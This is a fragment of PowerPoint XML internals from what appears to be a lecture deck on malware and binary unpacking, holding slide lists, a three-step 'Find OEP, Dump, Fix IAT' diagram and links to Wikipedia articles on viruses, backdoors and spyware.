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256" r:id="rId2"/>
    <p:sldId id="396" r:id="rId3"/>
    <p:sldId id="338" r:id="rId4"/>
    <p:sldId id="395" r:id="rId5"/>
    <p:sldId id="257" r:id="rId6"/>
    <p:sldId id="341" r:id="rId7"/>
    <p:sldId id="340" r:id="rId8"/>
    <p:sldId id="389" r:id="rId9"/>
    <p:sldId id="339" r:id="rId10"/>
    <p:sldId id="342" r:id="rId11"/>
    <p:sldId id="391" r:id="rId12"/>
    <p:sldId id="390" r:id="rId13"/>
    <p:sldId id="392" r:id="rId14"/>
    <p:sldId id="393" r:id="rId15"/>
    <p:sldId id="394" r:id="rId16"/>
    <p:sldId id="402" r:id="rId17"/>
    <p:sldId id="414" r:id="rId18"/>
    <p:sldId id="403" r:id="rId19"/>
    <p:sldId id="411" r:id="rId20"/>
    <p:sldId id="412" r:id="rId21"/>
    <p:sldId id="404" r:id="rId22"/>
    <p:sldId id="413" r:id="rId23"/>
    <p:sldId id="405" r:id="rId24"/>
    <p:sldId id="406" r:id="rId25"/>
    <p:sldId id="407" r:id="rId26"/>
    <p:sldId id="409" r:id="rId27"/>
    <p:sldId id="410" r:id="rId28"/>
    <p:sldId id="408" r:id="rId29"/>
    <p:sldId id="343" r:id="rId30"/>
    <p:sldId id="344" r:id="rId31"/>
    <p:sldId id="258" r:id="rId32"/>
    <p:sldId id="345" r:id="rId33"/>
    <p:sldId id="346" r:id="rId34"/>
    <p:sldId id="347" r:id="rId35"/>
    <p:sldId id="261" r:id="rId36"/>
    <p:sldId id="263" r:id="rId37"/>
    <p:sldId id="265" r:id="rId38"/>
    <p:sldId id="266" r:id="rId39"/>
    <p:sldId id="372" r:id="rId40"/>
    <p:sldId id="356" r:id="rId41"/>
    <p:sldId id="357" r:id="rId42"/>
    <p:sldId id="358" r:id="rId43"/>
    <p:sldId id="359" r:id="rId44"/>
    <p:sldId id="360" r:id="rId45"/>
    <p:sldId id="361" r:id="rId46"/>
    <p:sldId id="362" r:id="rId47"/>
    <p:sldId id="363" r:id="rId48"/>
    <p:sldId id="364" r:id="rId49"/>
    <p:sldId id="365" r:id="rId50"/>
    <p:sldId id="367" r:id="rId51"/>
    <p:sldId id="368" r:id="rId52"/>
    <p:sldId id="369" r:id="rId53"/>
    <p:sldId id="370" r:id="rId54"/>
    <p:sldId id="371" r:id="rId55"/>
    <p:sldId id="373" r:id="rId56"/>
    <p:sldId id="415" r:id="rId57"/>
    <p:sldId id="267" r:id="rId58"/>
    <p:sldId id="268" r:id="rId59"/>
    <p:sldId id="269" r:id="rId60"/>
    <p:sldId id="374" r:id="rId61"/>
    <p:sldId id="375" r:id="rId62"/>
    <p:sldId id="376" r:id="rId63"/>
    <p:sldId id="377" r:id="rId64"/>
    <p:sldId id="378" r:id="rId65"/>
    <p:sldId id="379" r:id="rId66"/>
    <p:sldId id="380" r:id="rId67"/>
    <p:sldId id="381" r:id="rId68"/>
    <p:sldId id="382" r:id="rId69"/>
    <p:sldId id="383" r:id="rId70"/>
    <p:sldId id="384" r:id="rId71"/>
    <p:sldId id="385" r:id="rId72"/>
    <p:sldId id="386" r:id="rId73"/>
    <p:sldId id="387" r:id="rId74"/>
    <p:sldId id="388" r:id="rId75"/>
    <p:sldId id="304" r:id="rId76"/>
    <p:sldId id="305" r:id="rId77"/>
    <p:sldId id="306" r:id="rId78"/>
    <p:sldId id="307" r:id="rId79"/>
    <p:sldId id="308" r:id="rId80"/>
    <p:sldId id="309" r:id="rId81"/>
    <p:sldId id="310" r:id="rId82"/>
    <p:sldId id="311" r:id="rId83"/>
    <p:sldId id="316" r:id="rId84"/>
    <p:sldId id="313" r:id="rId85"/>
    <p:sldId id="312" r:id="rId86"/>
    <p:sldId id="314" r:id="rId87"/>
    <p:sldId id="315" r:id="rId88"/>
    <p:sldId id="317" r:id="rId89"/>
    <p:sldId id="318" r:id="rId90"/>
    <p:sldId id="319" r:id="rId91"/>
    <p:sldId id="320" r:id="rId92"/>
    <p:sldId id="321" r:id="rId93"/>
    <p:sldId id="322" r:id="rId94"/>
    <p:sldId id="323" r:id="rId95"/>
    <p:sldId id="324" r:id="rId96"/>
    <p:sldId id="325" r:id="rId97"/>
    <p:sldId id="326" r:id="rId98"/>
    <p:sldId id="327" r:id="rId99"/>
    <p:sldId id="328" r:id="rId100"/>
    <p:sldId id="329" r:id="rId101"/>
    <p:sldId id="330" r:id="rId102"/>
    <p:sldId id="331" r:id="rId103"/>
    <p:sldId id="332" r:id="rId104"/>
    <p:sldId id="333" r:id="rId105"/>
    <p:sldId id="334" r:id="rId106"/>
    <p:sldId id="335" r:id="rId107"/>
    <p:sldId id="337" r:id="rId108"/>
    <p:sldId id="336" r:id="rId1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75" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="60" d="100"/>
          <a:sy n="60" d="100"/>
        </p:scale>
        <p:origin x="-1656" y="-126"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2160"/>
        <p:guide pos="2880"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:notesTextViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="1" d="1"/>
        <a:sy n="1" d="1"/>
      </p:scale>
      <p:origin x="0" y="0"/>
    </p:cViewPr>
  </p:notesTextViewPr>
  <p:sorterViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="1095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D20CCD-3501-4482-9D82-C625C9E9A6F2}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/process1" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1781408A-B84F-48AF-86E9-EC788F7FB60A}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
            <a:t>Find OEP</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="2400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BF59DE3B-CF81-4F5A-8AEB-540EECE6A66F}" type="parTrans" cxnId="{62A6E07C-6064-4A34-8F6A-C4DB3F4EBEA0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8577C3FE-55F9-443D-B1D3-C2555115DC96}" type="sibTrans" cxnId="{62A6E07C-6064-4A34-8F6A-C4DB3F4EBEA0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8A131677-C47A-4397-ADBE-BA96C1B3FF2E}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
            <a:t>Dump</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="2400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EB98EAE3-6FAC-4679-95E2-684CA7CBE00E}" type="parTrans" cxnId="{8E7CED2B-E429-498E-BD45-37EDDC9BDA86}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D9C5BF62-7ADA-48A0-B120-3414DB143468}" type="sibTrans" cxnId="{8E7CED2B-E429-498E-BD45-37EDDC9BDA86}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AA2DC89-DD54-4943-87CE-C2586C84F2B5}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0"/>
            <a:t>Fix IAT</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="2400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DDA6AA7-3C84-4077-8650-BC8EDEC88506}" type="parTrans" cxnId="{4DBC6806-582B-49A8-B538-E3541497D068}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{239D1B70-27EF-4891-9E3C-D75180055982}" type="sibTrans" cxnId="{4DBC6806-582B-49A8-B538-E3541497D068}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{448C8E6E-DAA6-46B1-8BC2-AF1E687A34D6}" type="pres">
      <dgm:prSet presAssocID="{17D20CCD-3501-4482-9D82-C625C9E9A6F2}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{AEDF2472-DB43-42EF-9125-24866B5F0C11}" type="pres">
      <dgm:prSet presAssocID="{1781408A-B84F-48AF-86E9-EC788F7FB60A}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9118775-B54C-409E-91B3-C93DD951C76E}" type="pres">
      <dgm:prSet presAssocID="{8577C3FE-55F9-443D-B1D3-C2555115DC96}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B198D491-B9A1-4C92-AE25-7DB8DBCF7BEA}" type="pres">
      <dgm:prSet presAssocID="{8577C3FE-55F9-443D-B1D3-C2555115DC96}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0DC62A1D-76EF-47FC-99E2-C7953D8AB6D0}" type="pres">
      <dgm:prSet presAssocID="{8A131677-C47A-4397-ADBE-BA96C1B3FF2E}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D8F92245-7AEB-4205-9665-ECFB6F50F6C1}" type="pres">
      <dgm:prSet presAssocID="{D9C5BF62-7ADA-48A0-B120-3414DB143468}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8089FB4A-5417-46A9-A52B-1C1B9EF5C970}" type="pres">
      <dgm:prSet presAssocID="{D9C5BF62-7ADA-48A0-B120-3414DB143468}" presName="connectorText" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="2"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20E28982-8A55-4904-99E4-18AC54723891}" type="pres">
      <dgm:prSet presAssocID="{7AA2DC89-DD54-4943-87CE-C2586C84F2B5}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-GB"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{8E7CED2B-E429-498E-BD45-37EDDC9BDA86}" srcId="{17D20CCD-3501-4482-9D82-C625C9E9A6F2}" destId="{8A131677-C47A-4397-ADBE-BA96C1B3FF2E}" srcOrd="1" destOrd="0" parTransId="{EB98EAE3-6FAC-4679-95E2-684CA7CBE00E}" sibTransId="{D9C5BF62-7ADA-48A0-B120-3414DB143468}"/>
    <dgm:cxn modelId="{D4963FC3-0FE5-46F4-A16F-B3EB789A1771}" type="presOf" srcId="{1781408A-B84F-48AF-86E9-EC788F7FB60A}" destId="{AEDF2472-DB43-42EF-9125-24866B5F0C11}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{0B37285A-88A5-4729-84E8-EF0DEECBF7C6}" type="presOf" srcId="{D9C5BF62-7ADA-48A0-B120-3414DB143468}" destId="{8089FB4A-5417-46A9-A52B-1C1B9EF5C970}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{4DBC6806-582B-49A8-B538-E3541497D068}" srcId="{17D20CCD-3501-4482-9D82-C625C9E9A6F2}" destId="{7AA2DC89-DD54-4943-87CE-C2586C84F2B5}" srcOrd="2" destOrd="0" parTransId="{1DDA6AA7-3C84-4077-8650-BC8EDEC88506}" sibTransId="{239D1B70-27EF-4891-9E3C-D75180055982}"/>
    <dgm:cxn modelId="{8A2CF468-8970-4A3C-A09F-85274C99D6CF}" type="presOf" srcId="{8577C3FE-55F9-443D-B1D3-C2555115DC96}" destId="{B198D491-B9A1-4C92-AE25-7DB8DBCF7BEA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{5460DEC5-F92B-4CD0-A40A-13EFCAB25804}" type="presOf" srcId="{7AA2DC89-DD54-4943-87CE-C2586C84F2B5}" destId="{20E28982-8A55-4904-99E4-18AC54723891}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{62A6E07C-6064-4A34-8F6A-C4DB3F4EBEA0}" srcId="{17D20CCD-3501-4482-9D82-C625C9E9A6F2}" destId="{1781408A-B84F-48AF-86E9-EC788F7FB60A}" srcOrd="0" destOrd="0" parTransId="{BF59DE3B-CF81-4F5A-8AEB-540EECE6A66F}" sibTransId="{8577C3FE-55F9-443D-B1D3-C2555115DC96}"/>
    <dgm:cxn modelId="{2A22573E-6118-4EE7-A243-7E9314A7BBD9}" type="presOf" srcId="{8577C3FE-55F9-443D-B1D3-C2555115DC96}" destId="{B9118775-B54C-409E-91B3-C93DD951C76E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{E422B86F-CF82-4E47-93BF-058F71D6BD06}" type="presOf" srcId="{17D20CCD-3501-4482-9D82-C625C9E9A6F2}" destId="{448C8E6E-DAA6-46B1-8BC2-AF1E687A34D6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{BE1E9E75-F9DC-4C24-9C12-CFCA27A075CD}" type="presOf" srcId="{8A131677-C47A-4397-ADBE-BA96C1B3FF2E}" destId="{0DC62A1D-76EF-47FC-99E2-C7953D8AB6D0}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{7E82A47B-3930-4FE4-A165-AFAFEBDA2AD0}" type="presOf" srcId="{D9C5BF62-7ADA-48A0-B120-3414DB143468}" destId="{D8F92245-7AEB-4205-9665-ECFB6F50F6C1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{1E237479-E913-4AE8-B7E7-6EF730068DD2}" type="presParOf" srcId="{448C8E6E-DAA6-46B1-8BC2-AF1E687A34D6}" destId="{AEDF2472-DB43-42EF-9125-24866B5F0C11}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{6C94DFB5-3D76-4609-A570-65B2E9800570}" type="presParOf" srcId="{448C8E6E-DAA6-46B1-8BC2-AF1E687A34D6}" destId="{B9118775-B54C-409E-91B3-C93DD951C76E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{A115CD8C-6F23-4E29-9619-6F8F87BEED20}" type="presParOf" srcId="{B9118775-B54C-409E-91B3-C93DD951C76E}" destId="{B198D491-B9A1-4C92-AE25-7DB8DBCF7BEA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{5CB7136D-76D1-47E3-B182-06F38173D4BC}" type="presParOf" srcId="{448C8E6E-DAA6-46B1-8BC2-AF1E687A34D6}" destId="{0DC62A1D-76EF-47FC-99E2-C7953D8AB6D0}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{D6A7D4DB-9876-4591-96C8-6AC91CA567C5}" type="presParOf" srcId="{448C8E6E-DAA6-46B1-8BC2-AF1E687A34D6}" destId="{D8F92245-7AEB-4205-9665-ECFB6F50F6C1}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{488FD6CA-D4EE-4CF5-A9CE-AAB16EB7835E}" type="presParOf" srcId="{D8F92245-7AEB-4205-9665-ECFB6F50F6C1}" destId="{8089FB4A-5417-46A9-A52B-1C1B9EF5C970}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{D6E3E268-D2E0-4D7C-B3FD-1DF75D4DEB95}" type="presParOf" srcId="{448C8E6E-DAA6-46B1-8BC2-AF1E687A34D6}" destId="{20E28982-8A55-4904-99E4-18AC54723891}"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F2472-DB43-42EF-9125-24866B5F0C11}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7233" y="1907311"/>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smtClean="0"/>
            <a:t>Find OEP</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="45225" y="1945303"/>
        <a:ext cx="2085893" cy="1221142"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B9118775-B54C-409E-91B3-C93DD951C76E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2385298" y="2287802"/>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GB" sz="2300" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2385298" y="2395031"/>
        <a:ext cx="320822" cy="321687"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0DC62A1D-76EF-47FC-99E2-C7953D8AB6D0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3033861" y="1907311"/>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smtClean="0"/>
            <a:t>Dump</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3071853" y="1945303"/>
        <a:ext cx="2085893" cy="1221142"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D8F92245-7AEB-4205-9665-ECFB6F50F6C1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5411926" y="2287802"/>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GB" sz="2300" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5411926" y="2395031"/>
        <a:ext cx="320822" cy="321687"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{20E28982-8A55-4904-99E4-18AC54723891}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6060489" y="1907311"/>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smtClean="0"/>
            <a:t>Fix IAT</a:t>
          </a:r>
          <a:endParaRPr lang="en-GB" sz="2400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6098481" y="1945303"/>
        <a:ext cx="2085893" cy="12211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EB0644-BD0B-40B8-AF7A-8CD10AC08897}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>10/04/2019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03A334-FE4D-4C3E-A61B-575B8EC3A56A}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="536197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Software" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Algorithm" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Spyware#cite_note-FTC-REPORT-2005-1" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Malicious_software" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Malware" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cryptosystem" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Backdoor_(computing)#cite_note-2" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="../slides/slide9.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Backdoor_(computing)#cite_note-1" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Cryptographic_system" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesMaster" Target="../notesMasters/notesMaster1.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Computer_virus#cite_note-Stallings_2012_p.182-1" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Home_router" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Computer_program" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Intel_Active_Management_Technology" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Computer" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Plaintext" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Quine_(computing)" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Authentication" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Chipse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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4003031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29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="872185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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4000102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60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3878871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64</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="939410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75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2955560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78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3213678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80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="692332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101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2404037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8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
